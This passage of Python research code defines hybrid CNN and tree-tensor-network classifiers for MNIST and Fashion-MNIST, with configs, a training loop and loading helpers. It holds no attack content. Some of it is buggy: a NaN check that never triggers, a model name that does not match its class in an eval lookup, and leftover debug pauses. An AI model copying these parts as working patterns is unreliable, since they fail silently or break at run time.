print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg3():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg3'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg3_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg3_BP, 
self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.01\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4]:\r\n x = mask_x(x, eps_mask, train)\r\n # print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg4():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg4'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg4_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg4_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, 
elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n eps_mask = 0.005\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4]:\r\n x = mask_x(x, eps_mask, train)\r\n # print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1chg5():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1chg5'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1chg5_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24)\r\n f-MNIST(d=4,chi=24)\r\n \"\"\"\r\n\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1chg5_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x, train=True):\r\n 
eps_mask = 0.02\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n\r\n x = mask_x(x, eps_mask, train)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n if n in [3, 4, 5]:\r\n x = mask_x(x, eps_mask, train)\r\n # print(x.sum(dim=1))\r\n return x.squeeze()\r\n\r\n\r\n# ==========================================================\r\ndef tn_multi_classifier_CNNBTN_mnist(para=None):\r\n logger = bf.logger(para['log_name']+'.log', level='info')\r\n log = logger.logger.info\r\n t0 = time.time()\r\n if para is None:\r\n para = parameter_default()\r\n para = make_para_consistent(para)\r\n log('=' * 15)\r\n log('Using device: ' + str(para['device']))\r\n log('=' * 15)\r\n bf.print_dict(para)\r\n\r\n labels2mat = (para['loss_func'] == 'MSELoss')\r\n if para['TN'] == 'MPS':\r\n data_dim = 2\r\n else:\r\n data_dim = 5\r\n train_loader, test_loader = bf.load_mnist_and_batch(\r\n para['dataset'], para['classes'], para['num_samples'], None, para['batch_size'],\r\n data_dim=data_dim, labels2mat=labels2mat, channel=len(para['classes']),\r\n project_name=para['project'], dev=para['device'])\r\n\r\n train_loader, train_num_tot = pre_process_dataset(\r\n train_loader, para, para['device'])\r\n test_loader, test_num_tot = pre_process_dataset(\r\n test_loader, para, para['device'])\r\n\r\n img = train_loader[7][0].reshape(train_loader[3][0].shape[0], -1)\r\n img = img[3, :].reshape(28, 28)\r\n matplotlib.pyplot.imshow(img.cpu())\r\n matplotlib.pyplot.show()\r\n input()\r\n\r\n num_batch_train = len(train_loader)\r\n log('Num of training samples:\\t' + str(train_num_tot))\r\n log('Num of testing samples:\\t' + str(test_num_tot))\r\n log('Num of training batches:\\t' + str(num_batch_train))\r\n log('Num of features:\\t' + str(para['length']))\r\n log('Dataset finish processed...')\r\n\r\n loss_func = tc.nn.CrossEntropyLoss()\r\n\r\n tn = eval(para['TN'] + '_BP(para)')\r\n info = dict()\r\n info['train_acc'] = list()\r\n info['train_loss'] = list()\r\n info['test_acc'] = list()\r\n info['norm_coeff'] = list()\r\n if para['normalize_tensors'] is not None:\r\n tn.normalize_all_tensors(para['normalize_tensors'])\r\n\r\n nc = test_accuracy_mnist(tn, test_loader, para)\r\n log('Initially, we have test acc = ' + str(nc / test_num_tot))\r\n\r\n parameters_cnn = nn.ParameterList()\r\n parameters_btn = nn.ParameterList()\r\n for x in tn.parameters():\r\n if x.ndimension() in [7, 9]:\r\n parameters_btn.append(x)\r\n else:\r\n parameters_cnn.append(x)\r\n\r\n if parameters_cnn.__len__() > 0:\r\n optimizer_cnn = tc.optim.Adam(parameters_cnn, lr=para['lr'][0])\r\n if parameters_btn.__len__() > 0:\r\n optimizer_btn = tc.optim.Adam(parameters_btn, lr=para['lr'][1])\r\n\r\n log('Start training...')\r\n log('[Note: data will be save at: ' + para['data_path'] + ']')\r\n coeff_norm = 0\r\n if para['if_test']:\r\n titles = 'Epoch \\t train_loss \\t train_acc \\t test_acc \\t norm_coeff'\r\n else:\r\n titles = 'Epoch \\t train_loss \\t train_acc \\t norm_coeff'\r\n log(titles)\r\n\r\n for t in range(para['it_time']):\r\n t_loop = time.time()\r\n train_loss = 0\r\n nc = 0\r\n if (num_batch_train > 1) and (t > 0):\r\n train_loader = bf.re_batch_data_loader(train_loader)\r\n for imgs, labels in train_loader:\r\n imgs, labels = imgs.to(para['device']), labels.to(para['device'])\r\n\r\n y = tn(imgs)\r\n loss = loss_func(y, labels)\r\n with tc.no_grad():\r\n train_loss += 
loss.data.item()\r\n\r\n loss.backward()\r\n\r\n for x in tn.parameters():\r\n if x.ndimension() in [7, 9]:\r\n s = x.shape\r\n # put grad in tangent space\r\n inner = tc.einsum('ac,ac->a', x.data.view(-1, s[-1]),\r\n x.grad.data.view(-1, s[-1]))\r\n grad = x.grad.data.view(-1, s[-1]) - tc.einsum(\r\n 'a,ab->ab', inner, x.data.view(-1, s[-1]))\r\n # normalize grad\r\n norm = grad.norm(dim=1, p=2) + 1e-12\r\n grad = tc.einsum('ab,a->ab', grad, 1 / norm)\r\n # print(tc.einsum('ac,ac->a', grad, x.data.view(-1, s[-1])))\r\n x.grad.data = grad.view(s)\r\n\r\n if parameters_cnn.__len__() > 0:\r\n optimizer_cnn.step()\r\n optimizer_cnn.zero_grad()\r\n if parameters_btn.__len__() > 0:\r\n optimizer_btn.step()\r\n optimizer_btn.zero_grad()\r\n\r\n for x in tn.parameters():\r\n if x.ndimension() in [7, 9]:\r\n s = x.shape\r\n x = x.view(-1, s[-1])\r\n norm = x.data.norm(\r\n dim=1, p=2)\r\n x.data[:, :] = tc.einsum(\r\n 'ab,a->ab', x.data, 1 / norm)\r\n x.data = x.data.view(s)\r\n\r\n if ((t + 1) % para['check_time']) == 0:\r\n nc0, _ = num_correct(labels, y.data)\r\n nc += nc0\r\n if ((t + 1) % para['check_time']) == 0:\r\n info['train_acc'].append(nc / train_num_tot)\r\n info['train_loss'].append(train_loss)\r\n info['norm_coeff'].append(coeff_norm)\r\n message = str(t + 1) + ': '\r\n message += '\\t %.6g' % info['train_loss'][-1]\r\n message += '\\t %.6g' % info['train_acc'][-1]\r\n if para['if_test']:\r\n nc = test_accuracy_mnist(\r\n tn, test_loader, para)\r\n info['test_acc'].append(nc / test_num_tot)\r\n message += '\\t %.6g' % info['test_acc'][-1]\r\n message += '\\t %.6g' % info['norm_coeff'][-1]\r\n log(message)\r\n if ((t+1) % para['save_time']) == 0:\r\n if (train_loss == float('nan')) or (train_loss == float('inf')):\r\n cprint('DO NOT save MPS since NAN/INF appears', color='red')\r\n sys.exit(1)\r\n else:\r\n info['time_1loop'] = time.time() - t_loop\r\n save_tensor_network(tn, para, info,\r\n para['data_path'], para['data_exp'])\r\n log('MPS saved: time cost per epoch = ' + str(info['time_1loop']))\r\n log(titles)\r\n x = np.arange(para['it_time'])\r\n fig = figure()\r\n plot(x, info['test_acc'])\r\n savefig('../results/' + para['TN'] + '_test_acc.png')\r\n\r\n info['time_tot'] = time.time() - t0\r\n log('Total time cost = ' + str(info['time_tot']))\r\n return para['data_path'], para['data_exp']\r\n\r\n\r\ndef parameter_default():\r\n para = dict()\r\n para['project'] = 'CNNBTNhybrid'\r\n para['which_TN_set'] = 'tne' # 'tne' or 'ctnn'\r\n para['TN'] = 'MPS'\r\n\r\n para['dataset'] = 'fashion-mnist'\r\n para['classes'] = list(range(10))\r\n para['num_samples'] = ['all'] * para['classes'].__len__()\r\n para['batch_size'] = 3000\r\n\r\n para['binary_imgs'] = False\r\n para['cut_size'] = [28, 28]\r\n para['img_size'] = [28, 28]\r\n # to feature cut-off; not usable yet\r\n para['update_f_index'] = False\r\n para['tol_cut_f'] = 1e-12\r\n\r\n para['it_time'] = 200\r\n para['lr'] = [1e-4, 1e-2]\r\n para['d'] = 2\r\n para['chi'] = 2\r\n\r\n para['linear_gauss_noise'] = None\r\n para['pre_normalize_mps'] = 1\r\n para['normalize_mps'] = False\r\n para['optimizer'] = 'Adam'\r\n para['mps_init'] = 'No.1'\r\n para['feature_map'] = 'taylor'\r\n para['feature_theta'] = 1\r\n para['activate_fun'] = None\r\n para['activate_fun_final'] = None\r\n para['Lagrangian'] = None\r\n para['Lagrangian_way'] = 0\r\n para['norm_p'] = 1\r\n para['loss_func'] = 'CrossEntropyLoss' # MSELoss, CrossEntropyLoss, NLLLoss\r\n\r\n para['check_time'] = 2\r\n para['save_time'] = 20\r\n para['if_test'] = True\r\n 
para['if_load'] = True\r\n para['if_load_smaller_chi'] = True\r\n para['clear_history'] = False\r\n para['normalize_tensors'] = None\r\n para['update_way'] = 'bp'\r\n para['multi_gpu_parallel'] = False\r\n\r\n para['log_name'] = 'record'\r\n para['device'] = 'cuda'\r\n\r\n para = make_para_consistent(para)\r\n return para\r\n\r\n\r\ndef make_para_consistent(para):\r\n if 'TN' not in para:\r\n para['TN'] = 'MPS'\r\n if 'norm_p' not in para:\r\n para['norm_p'] = 1\r\n if 'binary_imgs' not in para:\r\n para['binary_imgs'] = False\r\n if para['TN'] != 'MPS':\r\n para['normalize_mps'] = False\r\n para['activate_fun'] = None\r\n para['activate_fun_final'] = None\r\n para['data_path'] = './'\r\n if para['feature_map'] == 'fold_2d_order1':\r\n para['img_size'] = [round(para['img_size'][0]/2),\r\n round(para['img_size'][1]/2)]\r\n if para['feature_map'].lower() in ['normalized_linear',\r\n 'relsig', 'tansig', 'vsigmoid']:\r\n if para['d'] != 2:\r\n bf.warning('Warning: Inconsistent para[\\'d\\']=%g to '\r\n 'feature map. Please check...' % para['d'])\r\n para['d'] = 2\r\n if para['feature_map'].lower() == 'reltansig':\r\n if para['d'] != 3:\r\n bf.warning('Warning: Inconsistent para[\\'d\\']=%g to '\r\n 'feature map. Please check...' % para['d'])\r\n para['d'] = 3\r\n para['length'] = para['img_size'][0] * para['img_size'][1]\r\n if 'feature_index' not in para:\r\n para['feature_index'] = None\r\n elif para['feature_index'] is not None:\r\n if len(para['feature_index']) > para['length']:\r\n bf.warning('Error: length > len(feature_index).')\r\n sys.exit(1)\r\n elif max(para['feature_index']) > (para['length'] - 1):\r\n bf.warning('Error: feature_index.max() > len(feature_index).')\r\n sys.exit(1)\r\n else:\r\n para['length'] = len(para['feature_index'])\r\n para['channel'] = len(para['classes'])\r\n para['data_exp'] = data_exp_to_save_mps(para)\r\n if (para['device'] != 'cpu') and (not tc.cuda.is_available()):\r\n para['device'] = 'cpu'\r\n bf.warning('Cuda is not available in the device...')\r\n bf.warning('Changed to \\'cpu\\' instead...')\r\n return para\r\n\r\n\r\ndef data_exp_to_save_mps(para):\r\n exp = para['TN'].upper() + '_L' + str(para['length']) + '_d' + str(para['d']) + '_chi' + \\\r\n str(para['chi']) + '_classes' + str(para['classes']) + '_' + \\\r\n para['feature_map'] + '_' + para['dataset'].upper()\r\n if para['dataset'].lower() in ['mnist', 'fashion-mnist', 'fashionmnist']:\r\n if (para['cut_size'][0] != 28) or (para['cut_size'][1] != 28):\r\n exp += ('_size' + str(para['cut_size']))\r\n if (para['img_size'][0] != 28) or (para['img_size'][1] != 28):\r\n exp += str(para['img_size'])\r\n elif para['dataset'].lower() in ['cifar10', 'cifar-10']:\r\n if (para['cut_size'][0] != 32) or (para['cut_size'][1] != 32):\r\n exp += ('_size' + str(para['cut_size']))\r\n if (para['img_size'][0] != 32) or (para['img_size'][1] != 32):\r\n exp += str(para['img_size'])\r\n if 'feature_index' in para:\r\n if para['feature_index'] is not None:\r\n exp += '_FindexedNum' + str(len(para['feature_index']))\r\n if para['binary_imgs']:\r\n exp += 'binary'\r\n return exp\r\n\r\n\r\ndef load_saved_tn_smaller_chi_d(para, path1=None):\r\n if para['if_load']:\r\n path = './data/' + para['TN'] + '/'\r\n exp = data_exp_to_save_mps(para)\r\n mps_file = os.path.join(path, exp)\r\n if os.path.isfile(mps_file):\r\n message = 'Load existing ' + para['TN'] + ' data...'\r\n mps, info, _ = load_tensor_network(mps_file, para)\r\n return mps, info, message\r\n elif para['if_load_smaller_chi']:\r\n if path1 is None:\r\n path1 
= './data/' + para['TN'] + '_saved/'\r\n chi0 = para['chi']\r\n d0 = para['d']\r\n for d in range(d0, 1, -1):\r\n for chi in range(chi0, 1, -1):\r\n para['d'] = d\r\n para['chi'] = chi\r\n exp = data_exp_to_save_mps(para)\r\n mps_file = os.path.join(path1, exp)\r\n if os.path.isfile(mps_file):\r\n message = 'Load existing ' + para['TN'] + ' with (d, chi) = ' + \\\r\n str((para['d'], para['chi']))\r\n para['chi'], para['d'] = chi0, d0\r\n mps, info, _ = load_tensor_network(\r\n mps_file, para)\r\n return mps, info, message\r\n message = 'No existing smaller-chi/d ' + \\\r\n para['TN'] + ' found...\\n ' \\\r\n 'Create new ' + para['TN'] + ' data ...'\r\n para['chi'], para['d'] = chi0, d0\r\n return None, None, message\r\n else:\r\n message = 'No existing ' + para['TN'] + ' found...\\n Create new ' + \\\r\n para['TN'] + ' data ...'\r\n return None, None, message\r\n else:\r\n return None, None, 'Create new ' + para['TN'] + ' data ...'\r\n\r\n\r\ndef mask_x(x, eps_mask, train):\r\n if train:\r\n mask = (x.data > eps_mask)\r\n x = x * mask + 1e-12\r\n s = x.shape\r\n norm = x.data.permute(0, 1, 3, 4, 2).reshape(-1, s[2]).norm(dim=1)\r\n norm = norm.reshape(s[0], s[3], s[4])\r\n x = tc.einsum('ncdxy,nxy->ncdxy', x, 1 / norm)\r\n return x\r\n\r\n\r\n# ==========================================================================================\r\n# Collected hybrid models\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected1():\r\n para = parameter_default()\r\n para['TN'] = 'VL_CNN_BTN_Collected1'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected1_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST(d=4,chi=24) 0.999633 0.9887\r\n f-MNIST(d=4,chi=24) 0.971017 0.8966\r\n f-MNIST(d=4,chi=14) 0.971883\t 0.8887\r\n \"\"\"\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected1_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 8, kernel_size=3), # 26*26\r\n nn.LayerNorm([8, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 13*13\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=4), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2by2to1(\r\n 1, 1, 4, 4, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2by2to1(\r\n 1, 1, 2, 2, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2by2to1(\r\n 1, 1, 
1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x):\r\n num = x.shape[0]\r\n x = x.reshape(-1, 1, 28, 28)\r\n for n in range(6):\r\n if n == 3:\r\n x = x.reshape(-1, 4)\r\n x = nn.Softmax(dim=1)(x)\r\n x = x.reshape(num, 8, 8, 4, 1).permute(\r\n 0, 4, 3, 1, 2)\r\n x = eval('self.layer' + str(n) + '(x)')\r\n x = x.squeeze()\r\n # print(x.sum(dim=1))\r\n return x\r\n\r\n\r\ndef Paras_VL_CNN_BTN_Collected2():\r\n para = parameter_default()\r\n para['TN'] = 'CNN_BTN_Collected2'\r\n para['batch_size'] = 600\r\n para['d'] = 4\r\n para['chi'] = 24\r\n para['feature_map'] = 'cos_sin'\r\n para['normalize_tensors'] = 'norm2'\r\n para['update_way'] = 'rotate'\r\n\r\n para['mps_init'] = 'randn'\r\n para['Lagrangian_way'] = 0\r\n para['Lagrangian'] = None\r\n para['check_time'] = 5\r\n para['save_time'] = 1000\r\n para['it_time'] = 1000\r\n para['lr'] = [1e-4, 2e-2]\r\n return para\r\n\r\n\r\nclass VL_CNN_BTN_Collected2_BP(TTN_basic):\r\n \"\"\"\r\n train_acc test_acc\r\n MNIST\r\n f-MNIST(d=4, chi=24) 0.971217 0.8858\r\n \"\"\"\r\n\r\n def __init__(self, para_tn, tensors=None):\r\n super(VL_CNN_BTN_Collected2_BP, self).__init__(num_layers=6)\r\n theta = 1\r\n self.f_map = para_tn['feature_map']\r\n add_bias = False\r\n pre_process_tensors = 'square' # 'normalize', 'softmax', 'square'\r\n self.layer0 = nn.Sequential(\r\n nn.Conv2d(1, 4, kernel_size=3), # 26*26\r\n nn.LayerNorm([4, 26, 26], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.Conv2d(4, 8, kernel_size=3), # 24*24\r\n nn.LayerNorm([8, 24, 24], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 12*12\r\n ).to(device=para_tn['device'])\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(8, 32, kernel_size=3), # 10*10\r\n nn.LayerNorm([32, 10, 10], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 5*5\r\n ).to(device=para_tn['device'])\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(32, 64, kernel_size=2), # 4*4\r\n nn.LayerNorm([64, 4, 4], eps=1e-05, elementwise_affine=True),\r\n nn.ReLU(inplace=True),\r\n nn.MaxPool2d(kernel_size=2) # 2*2\r\n ).to(device=para_tn['device'])\r\n\r\n self.layer3 = TTN_Pool_2xto1(\r\n 1, 1, 32, 1, para_tn['d'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer4 = TTN_Pool_2xto1(\r\n 1, 1, 16, 1, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer5 = TTN_Pool_2xto1(\r\n 1, 1, 8, 1, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer6 = TTN_Pool_2xto1(\r\n 1, 1, 4, 1, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer7 = TTN_Pool_2xto1(\r\n 1, 1, 2, 1, para_tn['chi'], para_tn['chi'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.layer8 = TTN_Pool_2xto1(\r\n 1, 1, 1, 1, para_tn['chi'], para_tn['channel'],\r\n para_tn['device'], ini_way=para_tn['mps_init'],\r\n if_pre_proc_T=pre_process_tensors, add_bias=add_bias)\r\n self.input_tensors(tensors)\r\n\r\n def forward(self, x):\r\n 
